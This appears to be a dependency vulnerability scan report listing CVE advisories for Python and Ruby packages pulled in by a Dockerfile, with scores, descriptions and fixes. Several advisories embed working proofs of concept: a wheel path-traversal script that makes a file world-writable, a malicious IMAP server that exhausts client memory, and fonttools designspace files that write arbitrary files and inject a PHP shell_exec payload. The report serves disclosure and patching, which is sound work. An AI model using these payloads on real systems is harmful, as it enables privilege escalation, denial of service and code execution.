Demonstrating impact on setuptools try: from setuptools._vendor.wheel.cli.unpack import unpack print("[*] Loaded unpack from setuptools") except ImportError: from wheel.cli.unpack import unpack print("[*] Loaded unpack from wheel") # 1. Setup Target (Read-Only system file simulation) target = Path("poc_target.txt") target.write_text("SENSITIVE CONFIG") target.chmod(0o400) # Read-only print(f"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}") # 2. Run Vulnerable Unpack # The wheel contains "../../poc_target.txt". # unpack() will extract safely, BUT chmod() will hit the actual target file. try: unpack("evil-1.0-py3-none-any.whl", "unpack_dest") except Exception as e: print(f"[!] Ignored expected extraction error: {e}") # 3. Check Result final_perms = oct(target.stat().st_mode)[-3:] print(f"[*] Final Perms: {final_perms}") if final_perms == "777": print("VULNERABILITY CONFIRMED: Target file is now world-writable (777)!") else: print("[-] Attack failed.") result: Impact Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. Recommended Fix The unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract(). Suggested Patch: # extract() returns the actual path where the file was written extracted_path = wf.extract(zinfo, destination) # Only apply chmod if a file was actually written if extracted_path: permissions = zinfo.external_attr >> 16 & 0o777 Path(extracted_path).chmod(permissions)

jinja2 3.1.2 (pypi) pkg:pypi/jinja2@3.1.2 # Dockerfile (117:120) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/home/user/.cache/pip,sharing=shared,id=cache-pip \ Tools/environment_install/install-prereqs-ubuntu.sh -y Improper Neutralization of Special Elements Used in a Template Engine Affected range <=3.1.5 Fixed version 3.1.6 CVSS Score 5.4 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.214% EPSS Percentile 44th percentile Description An oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to use the |attr filter to get a reference to a string's plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment's attribute lookup. Protection Mechanism Failure Affected range <=3.1.4 Fixed version 3.1.5 CVSS Score 5.4 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.336% EPSS Percentile 56th percentile Description An oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to store a reference to a malicious string's format method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox. Improper Neutralization of Escape, Meta, or Control Sequences Affected range >=3.0.0 <=3.1.4 Fixed version 3.1.5 CVSS Score 5.4 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.459% EPSS Percentile 64th percentile Description A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja's sandbox is used. To exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <3.1.4 Fixed version 3.1.4 CVSS Score 5.4 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N EPSS Score 1.057% EPSS Percentile 77th percentile Description The xmlattr filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, /, >, or =, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the xmlattr filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting values as user input continues to be safe. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <3.1.3 Fixed version 3.1.3 CVSS Score 5.4 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N EPSS Score 0.151% EPSS Percentile 36th percentile Description The xmlattr filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the xmlattr filter, and an application doing so should already be verifying what keys are provided regardless of this fix.

net-imap 0.3.4.1 (gem) pkg:gem/net-imap@0.3.4.1 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Uncontrolled Resource Consumption Affected range >=0.3.0 <=0.3.8 Fixed version 0.3.9 CVSS Score 6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.528% EPSS Percentile 67th percentile Description Summary There is a possibility for denial of service by memory exhaustion when net-imap reads server responses. At any time while the client is connected, a malicious server can send can send a "literal" byte count, which is automatically read by the client's receiver thread. The response reader immediately allocates memory for the number of bytes indicated by the server response. This should not be an issue when securely connecting to trusted IMAP servers that are well-behaved. It can affect insecure connections and buggy, untrusted, or compromised servers (for example, connecting to a user supplied hostname). Details The IMAP protocol allows "literal" strings to be sent in responses, prefixed with their size in curly braces (e.g. {1234567890}\r\n). When Net::IMAP receives a response containing a literal string, it calls IO#read with that size. When called with a size, IO#read immediately allocates memory to buffer the entire string before processing continues. The server does not need to send any more data. There is no limit on the size of literals that will be accepted. Fix Upgrade Users should upgrade to net-imap 0.5.7 or later. A configurable max_response_size limit has been added to Net::IMAP's response reader. The max_response_size limit has also been backported to net-imap 0.2.5, 0.3.9, and 0.4.20. To set a global value for max_response_size, users must upgrade to net-imap ~> 0.4.20, or > 0.5.7. Configuration To avoid backward compatibility issues for secure connections to trusted well-behaved servers, the default max_response_size for net-imap 0.5.7 is very high (512MiB), and the default max_response_size for net-imap ~> 0.4.20, ~> 0.3.9, and 0.2.5 is nil (unlimited). When connecting to untrusted servers or using insecure connections, a much lower max_response_size should be used. # Set the global max_response_size (only ~> v0.4.20, > 0.5.7) Net::IMAP.config.max_response_size = 256 << 10 # 256 KiB # Set when creating the connection imap = Net::IMAP.new(hostname, ssl: true, max_response_size: 16 << 10) # 16 KiB # Set after creating the connection imap.max_response_size = 256 << 20 # 256 KiB # flush currently waiting read, to ensure the new setting is loaded imap.noop Please Note: max_response_size only limits the size per response. It does not prevent a flood of individual responses and it does not limit how many unhandled responses may be stored on the responses hash. Users are responsible for adding response handlers to prune excessive unhandled responses. Compatibility with lower max_response_size A lower max_response_size may cause a few commands which legitimately return very large responses to raise an exception and close the connection. The max_response_size could be temporarily set to a higher value, but paginated or limited versions of commands should be used whenever possible. For example, to fetch message bodies: imap.max_response_size = 256 << 20 # 256 KiB imap.noop # flush currently waiting read # fetch a message in 252KiB chunks size = imap.uid_fetch(uid, "RFC822.SIZE").first.rfc822_size limit = 252 << 10 message = ((0..size) % limit).each_with_object("") {|offset, str| str << imap.uid_fetch(uid, "BODY.PEEK[]<#{offset}.#{limit}>").first.message(offset:) } imap.max_response_size = 16 << 20 # 16 KiB imap.noop # flush currently waiting read References PR to introduce max_response_size: ✨ Limit max_response_size ruby/net-imap#444 Specific commit: 0ae8576c1 - lib/net/imap/response_reader.rb Backport to 0.4: ✨ Limit max_response_size (backport 0.4) ruby/net-imap#445 Backport to 0.3: ✨ Limit max_response_size (backport 0.3) ruby/net-imap#446 Backport to 0.2: ✨ Limit max_response_size (backport 0.2) ruby/net-imap#447 Improper Validation of Specified Type of Input Affected range >=0.3.2 <0.3.8 Fixed version 0.3.8 CVSS Score 6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.247% EPSS Percentile 48th percentile Description Summary There is a possibility for denial of service by memory exhaustion in net-imap's response parser. At any time while the client is connected, a malicious server can send can send highly compressed uid-set data which is automatically read by the client's receiver thread. The response parser uses Range#to_a to convert the uid-set data into arrays of integers, with no limitation on the expanded size of the ranges. Details IMAP's uid-set and sequence-set formats can compress ranges of numbers, for example: "1,2,3,4,5" and "1:5" both represent the same set. When Net::IMAP::ResponseParser receives APPENDUID or COPYUID response codes, it expands each uid-set into an array of integers. On a 64 bit system, these arrays will expand to 8 bytes for each number in the set. A malicious IMAP server may send specially crafted APPENDUID or COPYUID responses with very large uid-set ranges. The Net::IMAP client parses each server response in a separate thread, as soon as each responses is received from the server. This attack works even when the client does not handle the APPENDUID or COPYUID responses. Malicious inputs: # 40 bytes expands to ~1.6GB: "* OK [COPYUID 1 1:99999999 1:99999999]\r\n" # Worst *valid* input scenario (using uint32 max), # 44 bytes expands to 64GiB: "* OK [COPYUID 1 1:4294967295 1:4294967295]\r\n" # Numbers must be non-zero uint32, but this isn't validated. Arrays larger than # UINT32_MAX can be created. For example, the following would theoretically # expand to almost 800 exabytes: "* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n" Simple way to test this: require "net/imap" def test(size) input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\r\n" parser = Net::IMAP::ResponseParser.new parser.parse input end test(99_999_999) Fixes Preferred Fix, minor API changes Upgrade to v0.4.19, v0.5.6, or higher, and configure: # globally Net::IMAP.config.parser_use_deprecated_uidplus_data = false # per-client imap = Net::IMAP.new(hostname, ssl: true, parser_use_deprecated_uidplus_data: false) imap.config.parser_use_deprecated_uidplus_data = false This replaces UIDPlusData with AppendUIDData and CopyUIDData. These classes store their UIDs as Net::IMAP::SequenceSet objects (not expanded into arrays of integers). Code that does not handle APPENDUID or COPYUID responses will not notice any difference. Code that does handle these responses may need to be updated. See the documentation for UIDPlusData, AppendUIDData and CopyUIDData. For v0.3.8, this option is not available. For v0.4.19, the default value is true. For v0.5.6, the default value is :up_to_max_size. For v0.6.0, the only allowed value will be false (UIDPlusData will be removed from v0.6). Mitigation, backward compatible API Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher. For backward compatibility, uid-set can still be expanded into an array, but a maximum limit will be applied. Assign config.parser_max_deprecated_uidplus_data_size to set the maximum UIDPlusData UID set size. When config.parser_use_deprecated_uidplus_data == true, larger sets will raise Net::IMAP::ResponseParseError. When config.parser_use_deprecated_uidplus_data == :up_to_max_size, larger sets will use AppendUIDData or CopyUIDData. For v0.3,8, this limit is hard-coded to 10,000, and larger sets will always raise Net::IMAP::ResponseParseError. For v0.4.19, the limit defaults to 1000. For v0.5.6, the limit defaults to 100. For v0.6.0, the limit will be ignored (UIDPlusData will be removed from v0.6). Please Note: unhandled responses If the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses. However, net-imap has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses. This is not significantly different from connecting to a trusted server with a long-lived connection. To limit the maximum number of retained responses, a simple handler might look something like the following: limit = 1000 imap.add_response_handler do |resp| next unless resp.respond_to?(:name) && resp.respond_to?(:data) name = resp.name code = resp.data.code&.name if resp.data.respond_to?(:code) if Net::IMAP::VERSION > "0.4.0" imap.responses(name) { _1.slice!(0...-limit) } imap.responses(code) { _1.slice!(0...-limit) } else imap.responses(name).slice!(0...-limit) imap.responses(code).slice!(0...-limit) end end Proof of concept Save the following to a ruby file (e.g: poc.rb) and make it executable: #!/usr/bin/env ruby require 'socket' require 'net/imap' if !defined?(Net::IMAP.config) puts "Net::IMAP.config is not available" elsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data) puts "Net::IMAP.config.parser_use_deprecated_uidplus_data is not available" else Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size puts "Updated parser_use_deprecated_uidplus_data to :up_to_max_size" end size = Integer(ENV["UID_SET_SIZE"] || 2**32-1) def server_addr Addrinfo.tcp("localhost", 0).ip_address end def create_tcp_server TCPServer.new(server_addr, 0) end def start_server th = Thread.new do yield end sleep 0.1 until th.stop? end def copyuid_response(tag: "*", size: 2**32-1, text: "too large?") "#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\r\n" end def appenduid_response(tag: "*", size: 2**32-1, text: "too large?") "#{tag} OK [APPENDUID 1 1:#{size}] #{text}\r\n" end server = create_tcp_server port = server.addr[1] puts "Server started on port #{port}" # server start_server do sock = server.accept begin sock.print "* OK test server\r\n" cmd = sock.gets("\r\n", chomp: true) tag = cmd.match(/\A(\w+) /)[1] puts "Received: #{cmd}" malicious_response = appenduid_response(size:) puts "Sending: #{malicious_response.chomp}" sock.print malicious_response malicious_response = copyuid_response(size:) puts "Sending: #{malicious_response.chomp}" sock.print malicious_response sock.print "* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\r\n" sock.print "#{tag} OK CAPABILITY completed\r\n" cmd = sock.gets("\r\n", chomp: true) tag = cmd.match(/\A(\w+) /)[1] puts "Received: #{cmd}" sock.print "* BYE If you made it this far, you passed the test!\r\n" sock.print "#{tag} OK LOGOUT completed\r\n" rescue Exception => ex puts "Error in server: #{ex.message} (#{ex.class})" ensure sock.close server.close end end # client begin puts "Client connecting,.." imap = Net::IMAP.new(server_addr, port: port) puts "Received capabilities: #{imap.capability}" pp responses: imap.responses imap.logout rescue Exception => ex puts "Error in client: #{ex.message} (#{ex.class})" puts ex.full_message ensure imap.disconnect if imap end Use ulimit to limit the process's virtual memory. The following example limits virtual memory to 1GB: $ ( ulimit -v 1000000 && exec ./poc.rb ) Server started on port 34291 Client connecting,.. Received: RUBY0001 CAPABILITY Sending: * OK [APPENDUID 1 1:4294967295] too large? Sending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large? Error in server: Connection reset by peer @ io_fillbuf - fd:9 (Errno::ECONNRESET) Error in client: failed to allocate memory (NoMemoryError) /gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError) from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command' from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize' from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize' from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command' from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability' from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize' from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize' from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability' from /workspace/poc.rb:70:in '<main>'

cgi 0.3.6 (gem) pkg:gem/cgi@0.3.6 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Inefficient Regular Expression Complexity Affected range =0.3.6 Fixed version 0.3.7 CVSS Score 6.3 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.566% EPSS Percentile 68th percentile Description There is a possibility for Regular expression Denial of Service (ReDoS) by in the cgi gem. This vulnerability has been assigned the CVE identifier CVE-2025-27220. We recommend upgrading the cgi gem. Details The regular expression used in CGI::Util#escapeElement is vulnerable to ReDoS. The crafted input could lead to a high CPU consumption. This vulnerability only affects Ruby 3.1 and 3.2. If you are using these versions, please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later. Affected versions cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1. Credits Thanks to svalkanov for discovering this issue. Also thanks to nobu for fixing this vulnerability. Uncontrolled Resource Consumption Affected range =0.3.6 Fixed version 0.3.7 CVSS Score 6.3 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.778% EPSS Percentile 73rd percentile Description There is a possibility for DoS by in the cgi gem. This vulnerability has been assigned the CVE identifier CVE-2025-27219. We recommend upgrading the cgi gem. Details CGI::Cookie.parse took super-linear time to parse a cookie string in some cases. Feeding a maliciously crafted cookie string into the method could lead to a Denial of Service. Please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later. Affected versions cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1. Credits Thanks to lio346 for discovering this issue. Also thanks to mame for fixing this vulnerability.

pip 24.0 (pypi) pkg:pypi/pip@24.0 # Dockerfile (128:130) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ sudo apt-get update && sudo apt --no-install-recommends install -y python3-pip Improper Link Resolution Before File Access ('Link Following') Affected range <=25.2 Fixed version 25.3 CVSS Score 5.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N EPSS Score 0.017% EPSS Percentile 4th percentile Description When extracting a tar archive pip may not check symbolic links point into the extraction directory if the tarfile module doesn't implement PEP 706. Note that upgrading pip to a "fixed" version for this vulnerability doesn't fix all known vulnerabilities that are remediated by using a Python version that implements PEP 706. Note that this is a vulnerability in pip's fallback implementation of tar extraction for Python versions that don't implement PEP 706 and therefore are not secure to all vulnerabilities in the Python 'tarfile' module. If you're using a Python version that implements PEP 706 then pip doesn't use the "vulnerable" fallback code. Mitigations include upgrading to a version of pip that includes the fix, upgrading to a Python version that implements PEP 706 (Python >=3.9.17, >=3.10.12, >=3.11.4, or >=3.12), applying the linked patch, or inspecting source distributions (sdists) before installation as is already a best-practice. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range <26.0 Fixed version 26.0 CVSS Score 2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N EPSS Score 0.019% EPSS Percentile 5th percentile Description When pip is installing and extracting a maliciously crafted wheel archive, files may be extracted outside the installation directory. The path traversal is limited to prefixes of the installation directory, thus isn't able to inject or overwrite executable files in typical situations.

resolv 0.2.2 (gem) pkg:gem/resolv@0.2.2 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Improper Validation of Specified Quantity in Input Affected range <0.2.3 Fixed version 0.2.3 CVSS Score 6.6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U EPSS Score 0.046% EPSS Percentile 14th percentile Description A denial of service vulnerability has been discovered in the resolv gem bundled with Ruby. Details The vulnerability is caused by an insufficient check on the length of a decompressed domain name within a DNS packet. An attacker can craft a malicious DNS packet containing a highly compressed domain name. When the resolv library parses such a packet, the name decompression process consumes a large amount of CPU resources, as the library does not limit the resulting length of the name. This resource consumption can cause the application thread to become unresponsive, resulting in a Denial of Service condition. Affected Version The vulnerability affects the resolv gem bundled with the following Ruby series: Ruby 3.2 series: resolv version 0.2.2 and earlier Ruby 3.3 series: resolv version 0.3.0 Ruby 3.4 series: resolv version 0.6.1 and earlier Credits Thanks to Manu for discovering this issue. History Originally published at 2025-07-08 07:00:00 (UTC)

zipp 1.0.0 (pypi) pkg:pypi/zipp@1.0.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Uncontrolled Resource Consumption Affected range <3.19.1 Fixed version 3.19.1 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.016% EPSS Percentile 3rd percentile Description A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the Path module in both zipp and zipfile, such as joinpath, the overloaded division operator, and iterdir. Although the infinite loop is not resource exhaustive, it prevents the application from responding. The vulnerability was addressed in version 3.19.1 of jaraco/zipp.

fonttools 4.46.0 (pypi) pkg:pypi/fonttools@4.46.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop XML Injection (aka Blind XPath Injection) Affected range >=4.33.0 <4.60.2 Fixed version 4.60.2 CVSS Score 6.3 CVSS Vector CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L EPSS Score 0.264% EPSS Percentile 50th percentile Description Summary The fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). The vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting /etc/passwd). Overall this allows attackers to: Write font files to arbitrary locations on the filesystem Overwrite configuration files Corrupt application files and dependencies Obtain remote code execution The attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means. Affected Lines fontTools/varLib/__init__.py filename = vf.filename # Unsanitised filename output_path = os.path.join(output_dir, filename) # Path traversal vf.save(output_path) # Arbitrary file write PoC Set up malicious.designspace and respective source-*.ttf files in a directory like /Users/<username>/testing/demo/ (will impact relative file location within malicious.designspace) setup.py #!/usr/bin/env python3 import os from fontTools.fontBuilder import FontBuilder from fontTools.pens.ttGlyphPen import TTGlyphPen def create_source_font(filename, weight=400): fb = FontBuilder(unitsPerEm=1000, isTTF=True) fb.setupGlyphOrder([".notdef"]) fb.setupCharacterMap({}) pen = TTGlyphPen(None) pen.moveTo((0, 0)) pen.lineTo((500, 0)) pen.lineTo((500, 500)) pen.lineTo((0, 500)) pen.closePath() fb.setupGlyf({".notdef": pen.glyph()}) fb.setupHorizontalMetrics({".notdef": (500, 0)}) fb.setupHorizontalHeader(ascent=800, descent=-200) fb.setupOS2(usWeightClass=weight) fb.setupPost() fb.setupNameTable({"familyName": "Test", "styleName": f"Weight{weight}"}) fb.save(filename) if __name__ == '__main__': os.chdir(os.path.dirname(os.path.abspath(__file__))) create_source_font("source-light.ttf", weight=100) create_source_font("source-regular.ttf", weight=400) malicious.designspace <?xml version='1.0' encoding='UTF-8'?> <designspace format="5.0"> <axes> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/> </axes> <sources> <source filename="source-light.ttf" name="Light"> <location> <dimension name="Weight" xvalue="100"/> </location> </source> <source filename="source-regular.ttf" name="Regular"> <location> <dimension name="Weight" xvalue="400"/> </location> </source> </sources> <!-- Filename can be arbitrarily set to any path on the filesystem --> <variable-fonts> <variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json"> <axis-subsets> <axis-subset name="Weight"/> </axis-subsets> </variable-font> </variable-fonts> </designspace> Optional: You can put a file with any material within ../../tmp/newarbitraryfile.json in advance, the contents in the file will be overwritten after running the setup script in the following step. Run the setup.py script to generate source-*.tff files required for the malicious.designspace file. python3 setup.py Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename fonttools varLib malicious.designspace Validate arbitrary file write was performed by looking at path assigned within malicious designspace cat {{filename_location}} After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload. malicious2.designspace <?xml version='1.0' encoding='UTF-8'?> <designspace format="5.0"> <axes> <!-- XML injection occurs in labelname elements with CDATA sections --> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"> <labelname xml:lang="en"><![CDATA[<?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]]]><![CDATA[>]]></labelname> <labelname xml:lang="fr">MEOW2</labelname> </axis> </axes> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/> <sources> <source filename="source-light.ttf" name="Light"> <location> <dimension name="Weight" xvalue="100"/> </location> </source> <source filename="source-regular.ttf" name="Regular"> <location> <dimension name="Weight" xvalue="400"/> </location> </source> </sources> <variable-fonts> <variable-font name="MyFont" filename="output.ttf"> <axis-subsets> <axis-subset name="Weight"/> </axis-subsets> </variable-font> </variable-fonts> <instances> <instance name="Display Thin" familyname="MyFont" stylename="Thin"> <location><dimension name="Weight" xvalue="100"/></location> <labelname xml:lang="en">Display Thin</labelname> </instance> </instances> </designspace> When the program is run, we can show we control the contents in the new file fonttools varLib malicious2.designspace -o file123 Here being outputted to a localised area ignoring filename presented in variable-font We can look inside file123 to validate user controlled injection cat file123 to show <?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]> Executing the file and reading looking at the newly generated file php file123 ls -la /tmp/MEOW123 we can see that the file was just created showing RCE. Recommendations Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system

uri 0.12.2 (gem) pkg:gem/uri@0.12.2 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Improper Removal of Sensitive Information Before Storage or Transfer Affected range <0.12.5 Fixed version 0.12.5 CVSS Score 2.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U EPSS Score 0.018% EPSS Percentile 4th percentile Description Impact In affected URI version, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials. When using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. The vulnerability affects the uri gem bundled with the following Ruby series: 0.12.4 and earlier (bundled in Ruby 3.2 series) 0.13.2 and earlier (bundled in Ruby 3.3 series) 1.0.3 and earlier (bundled in Ruby 3.4 series) Patches Upgrade to 0.12.5, 0.13.3 or 1.0.4 References https://www.ruby-lang.org/en/news/2025/02/26/security-advisories/ https://hackerone.com/reports/2957667 Exposure of Sensitive Information to an Unauthorized Actor Affected range >=0.12.0 <0.12.4 Fixed version 0.12.4 CVSS Score 2.1 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N EPSS Score 0.038% EPSS Percentile 11th percentile Description There is a possibility for userinfo leakage by in the uri gem. This vulnerability has been assigned the CVE identifier CVE-2025-27221. We recommend upgrading the uri gem. Details The methods URI#join, URI#merge, and URI#+ retained userinfo, such as user:password, even after the host is replaced. When generating a URL to a malicious host from a URL containing secret userinfo using these methods, and having someone access that URL, an unintended userinfo leak could occur. Please update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later. Affected versions uri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and 1.0.0 to 1.0.2. Credits Thanks to Tsubasa Irisawa (lambdasawa) for discovering this issue. Also thanks to nobu for additional fixes of this vulnerability.

